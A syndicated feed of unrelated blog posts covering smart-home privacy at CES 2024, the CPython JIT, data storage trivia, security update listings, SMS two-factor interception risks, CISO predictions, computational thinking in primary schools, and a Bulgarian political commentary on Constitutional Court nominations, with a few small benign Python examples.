Privacy, Security, and Connected Devices: Key Takeaways From CES 2024

Post Syndicated from Deral Heiland original https://blog.rapid7.com/2024/01/18/privacy-security-and-connected-devices-key-takeaways-from-ces-2024/

Data privacy has become increasingly relevant in our age of smart technology. With everything becoming connected, including our homes, workplaces, cities, and even our cars, those who develop this technology are obligated to identify consumers’ expectations for privacy and then find the best ways to meet those expectations. This of course includes determining how best to secure the data with which these technologies interact. As you can imagine, meeting these requirements is no easy feat.

Yes, connected technology developers have their work cut out for them, and that’s why CES 2024 included a panel to discuss this very topic: “Safeguarding Your Sanctuary: Expectations for Data Privacy in the Smart Home Era.” I had the privilege of being a part of this four-person panel, and if you weren’t in the room with us, here’s your chance to get some of the key takeaways from our discussion.

Putting the Consumer’s Needs First

What do consumers expect? The answer to this question is not black and white because individual consumers have different views of what privacy means to them. Therefore, defining a baseline that puts control of much of this data back in the hands of the consumer becomes critical.

That said, if consumers are going to have the ability to make their own data decisions then it’s important that easily understood mechanisms for managing data privacy are embedded within their smart technology. The greater technology community should also do its part to educate consumers on the overall importance of privacy and security — and the role they play in ensuring it for themselves.

Another example of putting the consumer’s needs first is when vendors have an online presence where they share details about their security and privacy policies and processes along with a point of contact so security researchers and consumers can report potential security issues within a product. The vendor’s website is also a perfect place for them to step in and play a role in educating consumers on privacy and security topics. I pointed out that if a consumer is researching product brands for purchase and a vendor has nothing to say about their privacy policies or their security program, then I typically recommend steering away from that product brand.  

The Do’s and Don’ts of Data Collection and Sharing

User data collection and sharing is a central theme in consumer privacy and data security, and our CES panel discussed this at length. Consumer opt-in for data sharing is becoming the rule rather than the exception, and our panel agreed with this practice.

One good example of data sharing in which many consumers would choose to opt in is home security vendors sharing customer data with insurance companies, thereby allowing for the consumer to potentially get a discount on their homeowner’s insurance premiums.

We also discussed data collected by the product vendor for the purpose of improving product performance and capabilities. This process should be expected, but we also pointed out that vendors should have a data retention policy and process in place that includes purging data past a certain age. For one, most data typically loses value over time as it relates to product enhancement purposes; if this data isn’t purged it could create a higher level of risk for the vendor should the data be stolen in a breach. Also, collecting and storing data that may not have any apparent business value is a risky move that vendors should avoid.
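As a rough illustration of the retention idea above, the following Python sketch drops records older than a cutoff. The record layout, the `collected_at` field, and the 365-day window are all assumptions made for the example; none of them come from the panel discussion, and a real policy would pick its own window and also cover backups and downstream copies.

```python
from datetime import datetime, timedelta, timezone

# Hypothetical retention window; a real policy would choose its own value.
RETENTION = timedelta(days=365)


def purge_expired(records, now=None, retention=RETENTION):
    """Return only the records collected within the retention window.

    Each record is assumed to be a dict with a timezone-aware
    `collected_at` datetime (an illustrative schema, not a real product's).
    """
    if now is None:
        now = datetime.now(timezone.utc)
    cutoff = now - retention
    return [r for r in records if r["collected_at"] >= cutoff]


now = datetime(2024, 1, 18, tzinfo=timezone.utc)
records = [
    {"id": 1, "collected_at": now - timedelta(days=30)},
    {"id": 2, "collected_at": now - timedelta(days=400)},
]
kept = purge_expired(records, now=now)
print([r["id"] for r in kept])  # record 2 is past the window and is dropped
```

Running a job like this on a schedule keeps the stored data set, and therefore the exposure in a breach, bounded by the retention window.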

Outsmarting Connected Devices

Where do smart devices go to die… or to be reborn? Many consumers don’t consider the serious privacy and security implications of disposing of their devices, which explains why, over the last five years, more than 30% of the previously used Internet of Things (IoT) devices I have purchased from eBay for research and training purposes have arrived still containing consumer data, including product account passwords and Wi-Fi pre-shared keys.

Consumers need to ensure that they do a factory reset on the devices they are disposing of. Not only that, in today’s smart home and smart car scenarios, consumers need to be extra mindful of the connected devices they’re using that will change hands. Selling your home or car means more than just turning over the keys; it means factory resetting anything that’s interacted with your personal data. Vendors can also play a role here by properly documenting the processes for factory resetting their products and making sure those processes are easy for a consumer to perform.

[$] Improved code generation in the CPython JIT

Post Syndicated from daroc original https://lwn.net/Articles/958350/

Ken Jin from the Faster CPython project has been working on taking Python’s recently-added just-in-time (JIT) compiler further by adding support for a peephole optimizer that rewrites the JIT’s intermediate representation to introduce constant folding, type specialization, and other optimizations. Those techniques should provide significant benefits for the performance of many different types of code running on CPython.
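To give a feel for what constant folding in a peephole pass means, here is a toy sketch in Python. It is not CPython's optimizer and does not use the JIT's real intermediate representation; the instruction names (`CONST`, `LOAD`, `ADD`, `SUB`, `MUL`) and the tuple layout are invented for illustration. The pass looks at a small window of recently emitted stack instructions and replaces "push constant, push constant, operate" with a single precomputed constant.

```python
import operator

# Hypothetical toy instruction set for a stack machine; not CPython's IR.
FOLDABLE = {"ADD": operator.add, "SUB": operator.sub, "MUL": operator.mul}


def fold_constants(instructions):
    """Replace each CONST a, CONST b, <op> triple with one CONST result."""
    out = []
    for instr in instructions:
        out.append(instr)
        # Peephole window: inspect only the last three emitted instructions.
        if (
            len(out) >= 3
            and out[-1][0] in FOLDABLE
            and out[-2][0] == "CONST"
            and out[-3][0] == "CONST"
        ):
            op = FOLDABLE[out[-1][0]]
            folded = op(out[-3][1], out[-2][1])
            out[-3:] = [("CONST", folded)]
    return out


# 2 + 3 * 4 in stack order: the MUL folds first, then the ADD.
program = [("CONST", 2), ("CONST", 3), ("CONST", 4), ("MUL",), ("ADD",)]
print(fold_constants(program))

# A value that is only known at run time blocks folding.
print(fold_constants([("LOAD", "x"), ("CONST", 1), ("ADD",)]))
```

Because a folded result is itself a `CONST`, later operations can fold against it, which is how the nested expression collapses to a single instruction.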

Data Storage Beyond the Hardware: 4 Surprising Questions

Post Syndicated from Stephanie Doyle original https://www.backblaze.com/blog/data-storage-beyond-the-hardware-4-surprising-questions/

A decorative image showing several types of data storage medium, like a floppy disk, a USB stick, a CD, and the cloud.

We’ve gathered you together here today to address some of the weirdest questions (and answers) about everyone’s favorite topic: data storage.

From the outside looking in, it’s easy to think it’s a subject that is as dry as Ben Stein in “Ferris Bueller’s Day Off.” But, given that everyday functions are increasingly moving to the internet, data storage is, in some ways, the secret backbone of modern society.

Today it’s estimated that there are over 8,000 data centers (DCs) in the world, built on a variety of storage media, connected to various networks, consuming vast amounts of power, and taking up valuable real estate. Plus, the drive technology itself brings together engineering foci affected by (driving?) everything from clean room technology to DNA research. 

Fertile ground for strange, surprising questions, certainly. So, without further ado, here are some of our favorite questions about data storage. 

1. Does a Hard Drive Weigh More When It’s Full?

Short answer: for all practical purposes, no. Long answer: technically yes, but it’s such a minuscule amount that you wouldn’t be able to measure it. Shout out to David Zaslavsky for doing all the math; here’s the summary.

As Einstein famously proposed, E = mc^2. If it’s been a while since you took physics, that formula says that energy is equal to mass multiplied by the speed of light squared. Since energy and mass are equivalent in this way, we can infer that stored energy has a weight, even if it’s negligible.

Now, hard drives record data by magnetizing a thin film of ferromagnetic material. Basically, you’re forcing the atoms in a magnetic field to align in a different direction. And, since magnetic fields have differing amounts of energy depending on whether they’re aligned or antialigned, technically the weight does change. According to David’s math, it’d be approximately 10^-14 g for a 1TB hard drive.
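For a sense of scale, the mass-energy relation can be run in reverse to see how much stored energy a mass change of that size corresponds to. The short Python sketch below only converts the roughly 10^-14 g figure quoted above; it does not reproduce David's derivation, and the function name is made up for the example.

```python
C = 299_792_458.0  # speed of light in m/s (exact by SI definition)


def energy_for_mass(mass_kg):
    """E = m * c^2, with mass in kilograms and energy in joules."""
    return mass_kg * C ** 2


delta_mass_kg = 1e-14 / 1000  # the quoted ~10^-14 g, converted to kg
delta_energy_j = energy_for_mass(delta_mass_kg)
print(f"{delta_energy_j:.2f} J")  # a bit under one joule
```

In other words, a mass difference far too small to weigh still corresponds to an energy difference on the order of a joule, because c^2 is such a large conversion factor.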

2. How Loud Is the Cloud?

In the past, we’ve talked about how heavy the Backblaze Storage Cloud is, and we’ve spent some ink on how loud a Backblaze DC is. All that noise comes from a combination of factors, largely cooling systems. Back in 2017, we measured our DCs at approximately 78dB, but other sources report that DCs can reach up to 96dB.
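Because decibels are logarithmic, the gap between 78dB and 96dB is larger than it looks. The Python sketch below converts a decibel difference into a ratio of sound intensities using the standard relation ratio = 10^(ΔdB/10). It assumes both figures are on the same decibel scale and were measured in a comparable way, which the sources quoted here do not confirm.

```python
def intensity_ratio(db_high, db_low):
    """Ratio of sound intensities implied by two decibel levels."""
    return 10 ** ((db_high - db_low) / 10)


ratio = intensity_ratio(96, 78)
print(f"{ratio:.0f}x")  # roughly 63 times the sound intensity
```

Perceived loudness grows more slowly than intensity, so this is not "63 times as loud" to a listener, but it does show why an 18dB difference matters for hearing protection.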

When you’re talking about building your own storage, my favorite research data point was one Reddit user’s opinion:

A screenshot of a comment from Reddit user EpicEpyc that says:

I think a good rule of thumb will be "if you care about noise, don't get rackmount equipment" go a with a used workstation from your favorite brand and your ears will thank you

But it’s still worth investing in ways to reduce the noise, if not for worker safety, then to reduce the environmental impact of DCs, including noise pollution. There is a wealth of studies out there connecting noise pollution to cardiovascular disease, hypertension, high stress levels, sleep disturbance, and good ol’ hearing loss in humans. In our animal friends, noise pollution can disrupt predator/prey detection and avoidance, echolocation, reproduction, and navigation.

The good news is that there are technologies to keep data centers (relatively) quiet when they become disruptive to communities.  

3. How Long Does Data Stay Where You Stored It?

As much as we love old-school media here at Backblaze, we’re keeping this conversation to digital storage—so let’s chat about how long your data storage will retain your media, unplugged, in ideal environmental conditions. 

We like the way Enterprise Storage Forum put it: “Storage experts know that there are two kinds of drive in this world—those that have already failed, and those that will fail sooner or later.” Their article encompasses a pretty solid table of how long (traditional) storage media lasts.

A table that compares types of drive and how long they will last. 

Hard disk drives: 4-7 years 
Solid state drives: 5-10 years
Flash drives: 10 years average use

However, with new technologies—and their consumer applications—emerging, we might see a challenge to the data storage throne. The Institute of Physics reports that data written to a glass memory crystal could remain intact for a million years, a product they’ve dubbed the “Superman crystal.” So, look out for lasers altering the optical properties of quartz at the nanoscale. (That was just too cool not to say.)

4. What’s the Most Expensive Data Center Site?

And why? 

One thing we know from the Network Engineering team at Backblaze is that optimizing your connectivity (getting your data from point A to point B) to the strongest networks is no simple feat. Take this back to the real world: when you’re talking about what the internet truly is, you’re just connecting one computer to every other computer, and there are, in fact, cables involved.

The hardware infrastructure combines with population dispersion in murky ways. We’ll go ahead and admit that’s out of scope for this article. But, working backwards from the below image, let’s just say that where there are more data centers, it’s likely there are more network exchanges. 

An infographic depicting data center concentration on a global map.
Source.

From an operational standpoint, you’d likely assume it’s a bad choice to have your data center in the middle of the most expensive real estate and power infrastructures in the world, but there are tangible benefits to joining up all those networks at a central hub and to putting them in or near population centers. We call those spaces carrier hotels.

Here’s the best definition we found: 

There is no industry standard definition of a carrier hotel versus merely a data center with a meet-me room (MMR). But, generally, the term is reserved for the facilities where metro fiber carriers meet long-haul carriers—and the number of network providers numbers in the dozens.
Data Center Dynamics

Some sources go so far as to say that carrier hotels have to be in cities by definition. Either way, the result is that carrier hotels sit on some of the most expensive real estate in the world. Citing DGTL Infra from April 2023, here are the top 25 U.S. carrier hotels: 

A chart showing the top 25 carrier hotels in the United States and their locations.

Let’s take #12 on this list, the NYC listing. According to PropertyShark, it’s worth $1.15 billion. With a b. That’s before you even get to the tech inside the building. 

If you’re so inclined, flex those internet research skills and look up some of the other property values on the list. Some of them are a bit hard to find, and there are other interesting tidbits along the way. (And tell us what you find in the comments, of course.)

Bonus Question: Is It Over Already?

Look, do I want it to be over? No, never. But the number of weird and wonderful data storage questions that I could include in this article is infinite. Here’s a shortlist that other folks from Backblaze suggested:

  • How broken is too broken when it comes to restoring files from a hard drive? (This is a whole article in and of itself.)
  • When I send an email, how does it get to where it goes? (Check out Backblaze CEO Gleb Budman’s Bookblaze recommendation if you’re curious.) 
  • What happens to storage drives when we’re done with them? What does recycling look like? 

So, the real question is, what do you want to know? Sound off in the comments—we’ll do our best to research and answer.

The post Data Storage Beyond the Hardware: 4 Surprising Questions appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Security updates for Thursday

Post Syndicated from jake original https://lwn.net/Articles/958676/

Security updates have been issued by CentOS (ImageMagick), Debian (chromium), Fedora (golang-x-crypto, golang-x-mod, golang-x-net, golang-x-text, gtkwave, redis, and zbar), Mageia (tinyxml), Oracle (.NET 7.0, .NET 8.0, java-1.8.0-openjdk, java-11-openjdk, python3, and sqlite), Red Hat (gstreamer-plugins-bad-free, java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, and java-21-openjdk), SUSE (kernel, libqt5-qtbase, libssh, pam, rear23a, and rear27a), and Ubuntu (pam and zookeeper).

Another Attack Vector For SMS Interception

Post Syndicated from Bozho original https://techblog.bozho.net/another-attack-vector-for-sms-interception/

SMS codes for 2FA have been discussed for a long time, and everyone knowledgeable in security knows they are not secure. What’s more, you should remove your phone number from sensitive services like Gmail, because if an attacker can fall back to SMS, the account is compromised.

Many authors have discussed how insecure SMS is, including Brian Krebs, citing an example of NetNumber ID abuse, in addition to SIM swap attacks and SS7 vulnerabilities.

Another aspect that I recently thought about is again related to intermediaries. Bulk SMS resellers integrate with various telecoms around the globe and accept outgoing SMS via API calls, which they then forward to a telecom in the relevant country. Global companies that send a lot of SMS look for cheap bulk deals (you are probably aware that Twitter/X recently decided to charge for SMS 2FA, because it was incurring high costs). These services are sometimes called A2P (application-to-person).

This means that intermediaries receive the 2FA code before it reaches the subscriber. A malicious insider or an attacker that compromises those intermediaries can thus have access to 2FA codes before they reach the subscriber.

I don’t know if this attack vector has been used, but it is a valid attack – if an attacker knows the intermediaries that a given service is using, they can either try to compromise the systems of the intermediaries, or gain access through a compromised insider. In either scenario, the victim’s 2FA code will be accessible to the attacker in real time.

This just reinforces the rule of thumb – don’t rely on SMS for two-factor authentication.
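The post stops at the rule of thumb and does not name a replacement. One widely used option, brought in here as an illustration rather than as the author's recommendation, is a time-based one-time password (TOTP, RFC 6238): the code is computed on the user's device from a shared secret and the current time, so no SMS intermediary ever carries it. The sketch below uses only the Python standard library; the secret is the published test key from the RFCs and must never be used in practice.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) using HMAC-SHA1."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation offset
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at=None, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238): HOTP over a time counter."""
    if at is None:
        at = time.time()
    return hotp(secret, int(at // step), digits)


# Test key published in RFC 4226 / RFC 6238; for demonstration only.
RFC_TEST_SECRET = b"12345678901234567890"
print(totp(RFC_TEST_SECRET, at=59, digits=8))  # RFC 6238 test vector: 94287082
```

The server runs the same computation with its copy of the secret, so the only thing that has to travel at login time is the short code the user types in.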

The post Another Attack Vector For SMS Interception appeared first on Bozho's tech blog.

How CISOs’ Roles – and Security Operations – Will Change in 2024

Post Syndicated from Jaya Baloo original https://blog.rapid7.com/2024/01/18/how-cisos-roles-and-security-operations-will-change-in-2024/

It’s fair to say that 2023 was a turning point for the cybersecurity industry, and no one felt it more than the CISO. From the onslaught of ransomware and zero-day attacks, to the SEC’s new reporting rules, and added to technological innovation and sprawl, CISOs have never been under more pressure to get security right.

When you boil down a CISO’s job description to what it is we really do, predicting the unpredictable comes out at the top of the list. We must stay on top of our organization’s unique risk profile so that we can oversee the people, technologies, and processes that will keep threat actors out.

At the same time, our role at the executive level and our ability to effect change across the business are also top of mind. This is not what I or any of the fellow CISOs I speak with view as an “optional” part of our role; rather, being valued as a strategic contributor to the organization’s success is an imperative.

Without a doubt, 2024 is going to be a challenging year for those of us in the CISO role. Looking ahead, I expect the role itself to transform in several ways and, as a consequence, security operations will also undergo change. Read on for my top predictions of what will occur this year.

Prediction 1: CISOs will either have a seat at the table or they’ll be on the menu

For years, CISOs have been expected to do security in a vacuum, regardless of what the rest of the company is doing. Irrespective of the decisions being made by the rest of the organization, the CISO is expected to figure it all out and make it secure. They’re not just in charge of security; they’re also answerable for potentially bad security decisions made by others.

Regulations such as SEC disclosure, NIS2, changes to FedRAMP, and new executive orders around security mean there is more of a focus on structural and operational cadence with security in 2024. Therefore, the biggest question for most CISOs is going to be: how am I, and indeed how is my work, viewed by the business? The CISO is either going to be figuring out the solution with the business, or they will be an isolated person expected to figure out the solution based on a business decision that they’ve played no part in making.

Ultimately, CISOs will have a seat at the table or they will be the scapegoat when things inevitably go wrong. There is no in between. So, it’s essential that CISOs are able to demonstrate the value they provide and in a way that non-technical executives understand.

To demonstrate their value, CISOs must show how their security asks are tied to business imperatives, and the financial benefit or risk that each ask presents. Showing demonstrable improvements in security — as well as being able to easily adapt when environments change — helps executive boards see that CISOs and the security programs they develop and deploy are inherent enablers of business growth.

Prediction 2: Compliance will be top of mind for CISOs

We’re in a new era when it comes to reporting cyberattacks. CISOs are in a ‘butt-clenching’ phase trying to figure out how to comply and how to report cyber incidents when they occur. The new SEC rules make it clear that CISOs now need to think more carefully about how they talk about security and governance publicly and to regulators, when in the past they didn’t think about it by default.

This year, CISOs are going to be on a path of self-scrutiny. When claims are made that multi-factor authentication (MFA) is enabled across the enterprise and vulnerabilities are remediated immediately, for example, CISOs need to be checking that such actions are being done to avoid potential false claims and associated consequences.

There will be an immediate need for greater focus on compliance packs by CISOs, not just this year but over the next couple of years. Just having an ISO certification or a NIST framework doesn’t mean that operations are completely aligned.

A certification is merely a moment in time. However, CISOs need to be confident that operations are compliant beyond that piece of paper. Even the tiniest of silos, migrations, and changes create risks such as misconfigurations, vulnerabilities, and exposures; therefore, it’s essential to have a SOC team that has complete coverage of environments and can easily adapt when environments change. CISOs also must continue to ensure they’re employing a continuous assessment and validation process that aligns with their organization’s compliance requirements.

Prediction 3: CISOs will increase their emphasis on consolidation

No one will be surprised by my saying that businesses want more bang for their buck in 2024. Every business wants simplicity, not complexity, in their security stack! Just look at third-party risk management, for example. Funnily enough, CISOs don’t want to have to manage 500 third parties; they only want to have to manage five or so.

Every time there is an incident, CISOs and their security teams need to go to each third party, figure out what they’ve been doing, and keep following up with them. This is where the tool sprawl has huge consequences. If there are 500 parties to manage, that’s a killer for overstretched and under-resourced security teams.

As CISOs, we understand that throwing more money around doesn’t solve your security problem. Implementing various point solutions within the SOC won’t end bottlenecks, inefficiencies, and negative ROI. The real value for CISOs is when the SOC team is able to do more focused tasks without costs spiraling out of control.

Therefore, CISOs will be looking to consolidate and streamline this year, allowing for better manageability, efficiency, and — ultimately — security efficacy.

The CISO Community Coming Together

While I can’t be entirely sure how my role will look at the end of the year, one thing that does make me hopeful is the wonderful network of people that I’m a part of. It’s so important for the security industry to collaborate, and the connectivity of CISOs is critical to our achieving success both professionally and on behalf of the organizations we serve.

Security is a team sport, and the security community has a unique ability to come together to solve complex challenges. I’m looking forward to knowledge sharing with my peers and the greater industry as we prepare for and adapt to innovations in artificial intelligence (AI), quantum, and other exponential technologies.

For more thoughts from the Rapid7 team on what 2024 could bring, watch the Top Cybersecurity Predictions webinar on-demand.

Integrating computational thinking into primary teaching

Post Syndicated from Veronica Cucuiat original https://www.raspberrypi.org/blog/integrating-computational-thinking-into-primary-teaching/

“Computational thinking is really about thinking, and sometimes about computing.” – Aman Yadav, Michigan State University

Young people in a coding lesson.

Computational thinking is a vital skill if you want to use a computer to solve problems that matter to you. That’s why we consider computational thinking (CT) carefully when creating learning resources here at the Raspberry Pi Foundation. However, educators are increasingly realising that CT skills don’t just apply to writing computer programs, and that CT is a fundamental approach to problem-solving that can be extended into other subject areas. To discuss how CT can be integrated beyond the computing classroom and help introduce the fundamentals of computing to primary school learners, we invited Dr Aman Yadav from Michigan State University to deliver the penultimate presentation in our seminar series on computing education for primary-aged children. 

In his presentation, Aman gave a concise tour of CT practices for teachers, and shared his findings from recent projects around how teachers perceive and integrate CT into their lessons.

Research in context

Aman began his talk by placing his team’s work within the wider context of computing education in the US. The computing education landscape Aman described is dominated by the National Science Foundation’s ambitious goal, set in 2008, to train 10,000 computer science teachers. This objective has led to various initiatives designed to support computer science education at the K–12 level. However, despite some progress, only 57% of US high schools offer foundational computer science courses, only 5.8% of students enrol in these courses, and just 31% of the enrolled students are female. As a result, Aman and his team have worked in close partnership with teachers to address questions that explore ways to more meaningfully integrate CT ideas and practices into formal education, such as:

  • What kinds of experiences do students need to learn computing concepts, to be confident to pursue computing?
  • What kinds of knowledge do teachers need to have to facilitate these learning experiences?
  • What kinds of experiences do teachers need to develop these kinds of knowledge? 

The CT4EDU project

At the primary education level, the CT4EDU project posed the question “What does computational thinking actually look like in elementary classrooms, especially in the context of maths and science classes?” This project involved collaboration with teachers, curriculum designers, and coaches to help them conceptualise and implement CT in their core instruction.

A child at a laptop

During professional development workshops using both plugged and unplugged tasks, the researchers supported educators to connect their day-to-day teaching practice to four foundational CT constructs:

  1. Debugging
  2. Abstraction
  3. Decomposition
  4. Patterns

An emerging aspect of the research team’s work has been the important relationship between vocabulary, belonging, and identity-building, with implications for equity. Actively incorporating CT vocabulary in lesson planning and classroom implementation helps students familiarise themselves with CT ideas: “If young people are using the language, they see themselves belonging in computing spaces”. 

A main finding from the study is that teachers used CT ideas to explicitly engage students in metacognitive thinking processes, and to help them be aware of their thinking as they solve problems. Rather than teachers using CT solely to introduce their students to computing, they used CT as a way to support their students in whatever they were learning. This constituted a fundamental shift in the research team’s thinking and future work, which is detailed further in a conceptual article.

The Smithsonian Science for Computational Thinking project

The work conducted for the CT4EDU project guided the approach taken in the Smithsonian Science for Computational Thinking project. This project entailed the development of a curriculum for grades 3 and 5 that integrates CT into science lessons.

Teacher and young student at a laptop.

Part of the project included surveying teachers about the value they place on CT, both before and after participating in professional development workshops focused on CT. The researchers found that even before the workshops, teachers made connections between CT and the rest of the curriculum. After the workshops, an overwhelming majority agreed that CT has value (see image below). From this survey, it seems that CT ties things together for teachers in ways not possible or not achieved with other methods they’ve tried previously.

A graph from Aman's seminar.

Despite teachers valuing the CT approach, asking them to integrate coding into their practices from the start remains a big ask (see image below). Many teachers lack knowledge or experience of coding, and they may not be curriculum designers, which means that we need to develop resources that allow teachers to integrate CT and coding in natural ways. Aman proposes that this requires a longitudinal approach, working with teachers over several years, using plugged and unplugged activities, and working closely with schools’ STEAM or specialist technology teachers where applicable to facilitate more computationally rich learning experiences in classrooms.

A graph from Aman's seminar.

Integrated computational thinking

Aman’s team is also engaged in a research project to integrate CT at middle school level for students aged 11 to 14. This project focuses on the question “What does CT look like in the context of social studies, English language, and art classrooms?”

For this project, the team conducted three Delphi studies, and consequently created learning pathways for each subject, which teachers can use to bring CT into their classrooms. The pathways specify practices and sub-practices to engage students with CT, and are available on the project website. The image below exemplifies the CT integration pathways developed for the arts subject, where the relationship between art and data is explored from both directions: by using CT and data to understand and create art, and using art and artistic principles to represent and communicate data. 

Computational thinking in the primary classroom

Aman’s work highlights the broad value of CT in education. However, to meaningfully integrate CT into the classroom, Aman suggests that we have to take a longitudinal view of the time and methods required to build teachers’ understanding and confidence with the fundamentals of CT, in a way that is aligned with their values and objectives. Aman argues that CT is really about thinking, and sometimes about computing, to support disciplinary learning in primary classrooms. Therefore, rather than focusing on integrating coding into the classroom, he proposes that we should instead talk about using CT practices as the building blocks that provide the foundation for incorporating computationally rich experiences in the classroom. 

Watch the recording of Aman’s presentation:

You can access Aman’s seminar slides as well.

You can find out more about connecting research to practice for primary computing education by watching the recordings of the other seminars in our series on primary (K–5) teaching and learning. In particular, Bobby Whyte discusses similar concepts to Aman in his talk on integrating primary computing and literacy through multimodal storytelling.

Sign up for our seminars

Our 2024 seminar series is on the theme of teaching programming, with or without AI. In this series, we explore the latest research on how teachers can best support school-age learners to develop their programming skills.

On 13 February, we’ll hear from Majeed Kazemi (University of Toronto) about his work investigating whether AI code generator tools can support K-12 students to learn Python programming.

Sign up now to join the seminar:

The post Integrating computational thinking into primary teaching appeared first on Raspberry Pi Foundation.

Canadian Citizen Gets Phone Back from Police

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/01/canadian-citizen-gets-phone-back-from-police.html

After 175 million failed password guesses, a judge rules that the Canadian police must return a suspect’s phone.

[Judge] Carter said the investigation can continue without the phones, and he noted that Ottawa police have made a formal request to obtain more data from Google.

“This strikes me as a potentially more fruitful avenue of investigation than using brute force to enter the phones,” he said.

The Landing of the Party Lieutenants

Post Syndicated from Емилия Милчева original https://www.toest.bg/desantut-na-partiynite-leytenanti/

With a proven track record in the national security system. Possesses high professional and moral qualities.

This is a quote from the proposal with which, in November 2018, DPS nominated Ilko Zhelyazkov, a cadre of the former State Security (DS), for deputy chair of the National Bureau for Control of Special Intelligence Means. Zhelyazkov is known as “Peevski’s lieutenant” and was later sanctioned, together with his boss, under the Global Magnitsky Act.

Here is what the U.S. Department of the Treasury wrote in its reasons for the sanctions imposed:

Peevski used Zhelyazkov to carry out a bribery scheme involving Bulgarian residency documents for foreign nationals, as well as to bribe government officials through various means in exchange for their information and loyalty.

More of the same

Why recall all this? Because tunes on the same motifs are starting to be heard again: in 2024, parliament is due to elect around 80 people to 17 regulators and various other bodies (judicial appointment bodies, the Anti-Corruption Commission, and others). The landing of party lieutenants began with the nominations for judges at the Constitutional Court (CC), and specifically with the nomination of Desislava Atanasova, chair of the GERB parliamentary group.

The Constitution defines the requirements for CC judges: 15 years of legal experience and high professional and moral qualities, with the body that makes the choice also bearing the responsibility. (The CC consists of 12 constitutional judges, one third of whom are elected by the National Assembly, one third appointed by the president of the republic, and one third elected at a joint assembly of the judges of the Supreme Administrative Court and the Supreme Court of Cassation.) Since the nominations are parliament’s, morality and professionalism are pegged to the level of the parliamentarians.

If one takes the arithmetic mean of these qualities in the 49th National Assembly, the figure is unlikely to be high. Consequently, Atanasova clears the low bar with ease. And not only that bar, but also the requirement for 15 years of experience, toward which her years as legal counsel at a municipal hospital and her parliamentary experience are counted.

The problem is bigger than the glaring unsuitability and the insulting equation of political with legal experience by GERB leader Borisov and by Atanasova herself. The CC has other judges who owe their seats to a political lobby, but they have academic experience. For Desislava Atanasova, the problem is not even her law degree from UNWE or the comment made to Sega by PP–DB MP Boyko Rashkov, who is also a habilitated lecturer at the university.

We are not very satisfied with her performance as a student, so to speak. It seems to me that she studied by correspondence.

Unknown circumstances may have prevented Atanasova from being a brilliant student, and Rashkov is increasingly distancing himself from his parliamentary group and criticizing his colleagues’ actions. But the false start is not even in the diploma or the modest experience. The fact that Atanasova is known to the public solely as a political figure, a party bureaucrat, and in an authoritarian party like GERB at that, means that the conditioned reflex of loyalty and obedience to the Leader, built up over her 15 years in that party, will kick in. Not service to the Constitution, which guarantees citizens’ freedoms and equality “in dignity and rights.” It is enough to mention “Zlatanov’s notebook” and the notes on whom to take down, the selective pressure from the Bulgarian Food Safety Agency, the elephant on the fuel market that is invisible to the Commission for Protection of Competition, Lukoil… The list is long.

Atanasova’s star in the party rose not in GERB’s first cabinet, where she was briefly health minister without leaving a significant mark, but in the last few parliaments, in which she sharpened as a politician. She is known neither as an eloquent parliamentarian nor as an authoritative lawmaker, but responsibility for the quality of legislation in this parliament, notorious for repairing the repair of a law, is not hers alone.

Nevertheless, the proposal for her candidacy, like the one for the PP–DB nominee, retired supreme court judge Borislav Belazelkov, has been signed by all the leaders of the governing coalition (a coalition indeed, albeit without a coalition agreement). Boyko Borisov; the leaders of DB and PP, Hristo Ivanov, Atanas Atanasov, and Kiril Petkov; and, of course, the chair of the DPS parliamentary group, Delyan Peevski: all agree that Atanasova possesses the high professional and moral qualities needed to be a judge at the Constitutional Court. (Boyko Borisov is ending her career in politics with a dignified and well-paid retirement; Toest wrote back in December that she is among those dissatisfied with the leader. But it never even came to an attempt to unseat him.)

Thus, even before the vote in the plenary hall, the three formations have sealed their agreement that Atanasova and Belazelkov will be the new constitutional judges. No one comments on the other’s candidate, and each will vote without a murmur. This behavior damages the image of PP–DB, and especially of Democratic Bulgaria, because in the public’s eyes they look like opportunists ready for unprincipled compromises in order to get their share of appointments and thereby safeguard the interests of the businesses and lobbies behind them.

Between values and pragmatism

So what? After all, there will be someone at the CC to edit the rulings. True. Atanasova will have to cope with the initial drafting in the cases where she is the reporting judge. There is no way for her to avoid them. But there is another problem, which in Atanasova’s case can also be described as “political expediency.” In the very first of a string of serial appointments, the PP–DB coalition turned its back on its assurances of high professionalism, integrity, and public trust in the personnel renewal, the largest since the government of Ivan Kostov and the SDS. What can you do: politics is the art of the possible, which is to say it is immoral by nature, since pragmatism prevails over ideas and ideals.

Is another “possible” possible? For example, Kiril Petkov grabbing Borisov by the throat and yelling at him that he will expose corruption worth billions from GERB’s time in government unless he withdraws his candidate. Or Hristo Ivanov rejecting a Peevski nomination for lack of integrity… In general, orating as passionately as they did in the square and swearing that they will punish the corrupt, because now they have embraced them as a necessary evil. In that case it makes no difference how high the criteria are for electing members of the Supreme Judicial Council, the six prosecutors from the parliamentary quota in the Supreme Prosecutorial Council, the judicial inspectors, the members of the Commission for Protection of Competition, the Financial Supervision Commission, and so on and so forth, given that there is a majority of 160 votes that will elect whoever is named.

The two-thirds majority, or 160 votes, for electing members of regulators, which the three formations PP–DB, GERB–SDS, and DPS command, has now been written into the Constitution as well.

“Where there is a mistake, there is forgiveness”

They vote and forgive, and vote again, and forgive again. These are the plot lines the governing coalition-without-a-coalition-agreement will follow in the coming months. Just as they forgave (and wrote off) Interior Minister Kalin Stoyanov’s responsibility for the police brutality during the football fans’ protests against the actions of the BFS. “Where there is a mistake, there is forgiveness,” said Atanas Atanasov, co-chair of Democratic Bulgaria, on that occasion. Political forgiveness in the style of “Quiet, let’s not anger Peevski,” as Capital called it. Worthy of a pamphlet, yet it passes for political compromise.

Yet just over two years ago, on the occasion of the destruction of Bulgartabac, Hristo Ivanov declared that the cops and the corrupt of the Saray had destroyed the enterprise.

This is the DPS model. This is the plundering. This is the spirit of destruction of Peevski and the Saray.

